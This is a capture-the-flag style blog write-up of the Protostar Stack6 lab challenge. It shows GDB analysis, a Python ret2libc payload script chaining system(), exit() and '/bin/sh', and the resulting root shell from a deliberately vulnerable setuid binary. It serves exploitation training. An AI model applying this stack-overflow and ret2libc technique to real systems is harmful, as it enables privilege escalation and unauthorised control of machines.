B2B - Protostar, Stack6 (x86)

Introduction:

B2B is a series I have forced upon myself to make sure my basics are covered when it comes to exploitation. After passing my OSCE, I took a little break from exploitation to focus on a few work aspects, but now I am hungry for more lower level nonsense.

This series will focus mainly on exploitation challenges which cover various techniques. First of which, is the stack overflow challenges within the Protostar image from “exploit education” found here. I gave myself two main rules to stick to whilst working through all these challenges.

1) Don’t read the C source code for each challenge, only the hints section if required

2) Don’t read other peoples write ups for these challenges unless I have already finished it and want to see other routes to further my interest

Stack 6

The seventh challenge of Protostar is “Stack 6”. I approached each challenge with a similar set of steps, so each post will likely follow a similar template(ish). Including initial running, inspecting the disassembly of the binary and some other specific steps in between before finally crafting a payload and owning the process.

Our initial use of the program identified the following:

$ ./stack6
input path please: test
got path test

The program simply appears to take a single input, presumably does something with it in the background and then prints some output based on the value that was specified. In this case, the binary took the string “test” as it’s “input path”, and printed “got path test”. This is a different set of output compared to our previous challenges, which looks like we might have a new challenge on our hands.

Similar to the last challenge, I started this one off by looking at the hints. I knew it would be another stack based buffer overflow, however I was more curious to see what direction they had decided to go in since we have now done an overflow with our own shellcode.

The hints for this challenge are:

So from the hints alone, we can see that we have a limit on our return address, which we should be able to identify when disassembling the binary and we can attempt to exploit the vulnerability with ROP or ret2libc. This either means the DEP bit has been set during compilation or the binary has been designed to prevent us from jumping to shellcode within our buffer (emulating a non-executable stack or similar).

A quick note about ret2libc attacks, Ippsec has an amazing video focusing on the HacktheBox target ‘October’, which is a pretty old box. This, if I remember right, had a ret2libc overflow for it’s priv esc route and the video was flawless. Highly recommend checking that out for a much better explanation than I can give. However for the sake of my own knowledge and refresher, I will jot down a few points about ret2libc to help cover the “why” and “whats” of the technique.

Now, back to the task at hand. As usual, I fired up the binary in GDB and checked out it’s contents. First I inspected the functions:

(gdb) info functions
All defined functions:

File stack6/stack6.c:
void getpath(void);
int main(int, char **);

This time around we have a main function, and a getpath function. Let’s first check out the main function:

(gdb) disas main
Dump of assembler code for function main:
0x080484fa <main+0>:	push   ebp
0x080484fb <main+1>:	mov    ebp,esp
0x080484fd <main+3>:	and    esp,0xfffffff0
0x08048500 <main+6>:	call   0x8048484 <getpath>
0x08048505 <main+11>:	mov    esp,ebp
0x08048507 <main+13>:	pop    ebp
0x08048508 <main+14>:	ret    
End of assembler dump.

If we break this short function down, we simply see the following:

As the main function doesn’t appear to do anything but call getpath(), we should disassemble this function and inspect what is happening:

(gdb) disas getpath 
Dump of assembler code for function getpath:
0x08048484 <getpath+0>:	push   ebp
0x08048485 <getpath+1>:	mov    ebp,esp
0x08048487 <getpath+3>:	sub    esp,0x68
0x0804848a <getpath+6>:	mov    eax,0x80485d0
0x0804848f <getpath+11>:	mov    DWORD PTR [esp],eax
0x08048492 <getpath+14>:	call   0x80483c0 <printf@plt>
0x08048497 <getpath+19>:	mov    eax,ds:0x8049720
0x0804849c <getpath+24>:	mov    DWORD PTR [esp],eax
0x0804849f <getpath+27>:	call   0x80483b0 <fflush@plt>
0x080484a4 <getpath+32>:	lea    eax,[ebp-0x4c]
0x080484a7 <getpath+35>:	mov    DWORD PTR [esp],eax
0x080484aa <getpath+38>:	call   0x8048380 <gets@plt>
0x080484af <getpath+43>:	mov    eax,DWORD PTR [ebp+0x4]
0x080484b2 <getpath+46>:	mov    DWORD PTR [ebp-0xc],eax
0x080484b5 <getpath+49>:	mov    eax,DWORD PTR [ebp-0xc]
0x080484b8 <getpath+52>:	and    eax,0xbf000000
0x080484bd <getpath+57>:	cmp    eax,0xbf000000
0x080484c2 <getpath+62>:	jne    0x80484e4 <getpath+96>
0x080484c4 <getpath+64>:	mov    eax,0x80485e4
0x080484c9 <getpath+69>:	mov    edx,DWORD PTR [ebp-0xc]
0x080484cc <getpath+72>:	mov    DWORD PTR [esp+0x4],edx
0x080484d0 <getpath+76>:	mov    DWORD PTR [esp],eax
0x080484d3 <getpath+79>:	call   0x80483c0 <printf@plt>
0x080484d8 <getpath+84>:	mov    DWORD PTR [esp],0x1
0x080484df <getpath+91>:	call   0x80483a0 <_exit@plt>
0x080484e4 <getpath+96>:	mov    eax,0x80485f0
0x080484e9 <getpath+101>:	lea    edx,[ebp-0x4c]
0x080484ec <getpath+104>:	mov    DWORD PTR [esp+0x4],edx
0x080484f0 <getpath+108>:	mov    DWORD PTR [esp],eax
0x080484f3 <getpath+111>:	call   0x80483c0 <printf@plt>
0x080484f8 <getpath+116>:	leave  
0x080484f9 <getpath+117>:	ret    
End of assembler dump.

This is more like it, lots more seems to be going on here! Let’s break this down to a higher level and see what it looks like:

To start inspecting the memory during the input process, I place a breakpoint on the gets() function, step over and use the string “AAAABBBBCCCC” so I can easily see the characters in the stack:

(gdb) b *getpath+38
Breakpoint 1 at 0x80484aa: file stack6/stack6.c, line 13.
(gdb) r
Starting program: /opt/protostar/bin/stack6 
input path please: 
Breakpoint 1, 0x080484aa in getpath () at stack6/stack6.c:13
13	stack6/stack6.c: No such file or directory.
in stack6/stack6.c
(gdb) ni
AAAABBBBCCCC
15	in stack6/stack6.c
(gdb) x/30wx $esp
0xbffffc30:	0xbffffc4c	0x00000000	0xb7fe1b28	0x00000001
0xbffffc40:	0x00000000	0x00000001	0xb7fff8f8	0x41414141 <-- input starts here
0xbffffc50:	0x42424242	0x43434343	0xbffffc00	0xb7eada75
0xbffffc60:	0xb7fd7ff4	0x080496ec	0xbffffc78	0x0804835c
0xbffffc70:	0xb7ff1040	0x080496ec	0xbffffca8	0x08048539
0xbffffc80:	0xb7fd8304	0xb7fd7ff4	0x08048520	0xbffffca8
0xbffffc90:	0xb7ec6365	0xb7ff1040	0xbffffca8	0x08048505
0xbffffca0:	0x08048520	0x00000000

Now we know our input starts from the address “0xbffffc4c”, we can see where the return address limitation comes in to play. From first glance, the restriction checks to see if our return address (EIP overwrite) equals “0xbf000000” after performing an ‘and’ calculation against the address with the value “0xbf000000”. Without getting into this instruction too much, if we ‘and’ out input start address and the value specified, we should get the result “0xbf000000”. Ultimately, this means we can’t overwrite the EIP value with an address on our stack. In short, we can’t just jump to our own shellcode - sadface. Even if the stack is executable (which I haven’t confirmed at this point), we wouldn’t be able to just jump to it and run the code.

We can check that this is the case by gaining control of the process EIP and attempting to return to a position in our buffer to see what happens. By using a long, easily recognisable string as input, we can see the value that overwrites our EIP and causes a crash. Giving us our offset:

(gdb) c
Continuing.
got path AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPUUUURRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ

Program received signal SIGSEGV, Segmentation fault.
0x55555555 in ?? ()

As our EIP was overwritten with “0x55555555” we failed to continue and the program crashed. “0x55” in ASCII is “U”, so we can get our offset with the following logic:

This means we should have control of EIP with the following payload:

python -c 'print "A"*80 + "BBBB"' > /tmp/stack6
(gdb) r < /tmp/stack6
Starting program: /opt/protostar/bin/stack6 < /tmp/stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()

Excellent! Now let’s just replace this value with an address within our payload and see what happens (this is where we should trigger the “and/cmp” instruction:

python -c 'print "A"*80 + "\x54\xfc\xff\xbf"' > /tmp/stack6

If we break on the ‘and’ instruction and inspect our EAX register, we see the following:

(gdb) b *getpath+52
(gdb) i r $eax
	eax            0xbffffc54	-1073742764

At this point, EAX is equal to our return address (in this case, our EIP overwrite).

Now if we step over one more instruction with ‘ni’, we should see our new EAX now equals the restricted return value:

(gdb) ni
0x080484bd	17	in stack6/stack6.c
(gdb) i r $eax
eax            0xbf000000	-1090519040

Stepping over again, we hit out fail condition and the process errors out:

(gdb) c
Continuing.
bzzzt (0xbffffc54)

Program exited with code 01.

Now we have proven that we aren’t able to return into our payload and jump to some user defined shellcode, we know we need a different attack vector. This is where the ‘ret2libc / ROP’ hints becomes relevant.

There are a couple of things we need for a ret2libc attack, again, if you haven’t done one before, check out the IppSec video or other various write ups to help piece together the puzzle. Effectively, we want to find a system() call, a ‘/bin/sh’ string and an exit() call within the libc library that has been compiled into the binary.

Luckily, we can get all the information we require directly from GDB. First off we want to find the libc library that has been compiled into the binary:

(gdb) info proc mappings
process 2647
cmdline = '/opt/protostar/bin/stack6'
cwd = '/opt/protostar/bin'
exe = '/opt/protostar/bin/stack6'
Mapped address spaces:

    Start Addr   End Addr       Size     Offset objfile
    0x8048000  0x8049000     0x1000          0        /opt/protostar/bin/stack6
    0x8049000  0x804a000     0x1000          0        /opt/protostar/bin/stack6
    0xb7e96000 0xb7e97000     0x1000          0        
    0xb7e97000 0xb7fd5000   0x13e000          0         /lib/libc-2.11.2.so
    0xb7fd5000 0xb7fd6000     0x1000   0x13e000         /lib/libc-2.11.2.so
    0xb7fd6000 0xb7fd8000     0x2000   0x13e000         /lib/libc-2.11.2.so
    0xb7fd8000 0xb7fd9000     0x1000   0x140000         /lib/libc-2.11.2.so
    0xb7fd9000 0xb7fdc000     0x3000          0        
    0xb7fe0000 0xb7fe2000     0x2000          0        
    0xb7fe2000 0xb7fe3000     0x1000          0           [vdso]
    0xb7fe3000 0xb7ffe000    0x1b000          0         /lib/ld-2.11.2.so
    0xb7ffe000 0xb7fff000     0x1000    0x1a000         /lib/ld-2.11.2.so
    0xb7fff000 0xb8000000     0x1000    0x1b000         /lib/ld-2.11.2.so
    0xbffeb000 0xc0000000    0x15000          0           [stack]

From the above, we can see the base address of libc is “0xb7e97000” and the actual library itself is located in “/lib/libc-2.11.2.so”. Also the return address limitation will not be triggered by a return address in this library as we will not be within the “0xbf000000” - “0xbfffffff” range.

Now we know our base address (which will come in handy shortly), we want to find the addresses of two libc functions, system() and exit(). Again, we can use GDB to find these in the current process:

(gdb) print system
$1 = {<text variable, no debug info>} 0xb7ecffb0 <__libc_system>

(gdb) print exit
$1 = {<text variable, no debug info>} 0xb7ec60c0 <*__GI_exit>

These will make sense if you know how to do ret2libc attacks or have read additional information about them. I am just going to assume you are comfy with it and can continue following along. Our final goal is to find the offset of the string “/bin/sh” within libc. This can be easily done with ‘strings’:

$  strings -a -t x /lib/libc-2.11.2.so | grep /bin/sh
11f3bf /bin/sh

We want to use this offset with the base address to give us the exact location of this string within the processes memory:

​ “0xb7e97000” + “0x0011f3bf” = “0xb7fb63bf”

So, we now have the three important addresses we need to complete our ret2libc attack:

Okay, so now we have our important values, we need to know how our call to system() will look. As this is x86, we need to adhere to the calling convention of a function. Arguments are pushed onto the stack in the parameter order, followed by the call. So if we reverse this for our payload we will be pushing our function, followed by a pointer to our argument.

For a ret2libc attack, we want our payload to look like the following:

junk + system() + exit() + "/bin/sh"

Breaking this down, we have our “A” buffer, followed by our EIP overwrite which is our system() call, followed by the return address that we want to land in after our system() call, in this case exit(). Finally followed by the address of our system() parameter, which in this case is our “/bin/sh” string located within libc itself.

With our previously calculated values, let’s try out a payload. This is the first stack challenge where I needed a little script to complete the generation of the payload. With various values required, it felt easier in the text editor rather than a one-liner:

stack6.py:

import struct
def build():
    libc_base = 0xb7e97000
    binsh_offset = 0x11f3bf
  
    string_addr = libc_base + binsh_offset
    system_addr = 0xb7ecffb0
    exit_addr = 0xb7ec60c0

    padding = 'A' * 80

    payload = padding
    payload += struct.pack("I", system_addr)
    payload += struct.pack("I", exit_addr)
    payload += struct.pack("I", string_addr)
    print payload

build()

Now we have our script, let’s try to exploit this overflow with our newly crafted ret2libc payload:

$ python /tmp/stack6.py | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���AAAAAAAAAAAA����`췿c��
$ 

It looks like our shell is instantly exiting like last time. To confirm our system call is being executed correctly we can step through the exploit in GDB. If we break on the gets() function, similar to before, and then step through instructions with ‘ni’, we eventually see a call to system() with our argument:

(gdb) 
got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���AAAAAAAAAAAA����`췿c��
23	in stack6/stack6.c
(gdb) 
0x080484f9 in getpath () at stack6/stack6.c:23
23	in stack6/stack6.c
(gdb) ni
__libc_system (line=0xb7fb63bf "/bin/sh") at ../sysdeps/posix/system.c:179
179	../sysdeps/posix/system.c: No such file or directory.
	in ../sysdeps/posix/system.c

Now we can see this is actually being called with our “/bin/sh” argument, let’s try the ‘cat’ trick outside of GDB similar to the stack5 challenge:

$ (python /tmp/stack6.py; cat) | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���AAAAAAAAAAAA����`췿c��
whoami
root
id
uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)

This is awesome! We have now completed a ret2libc challenge, which had a specific limitation on the return address. Not only that, but we wrote a little script to generate the payload and we calculated offsets and learnt how to find base addresses and including libraries. Only one more stack challenge left of the series!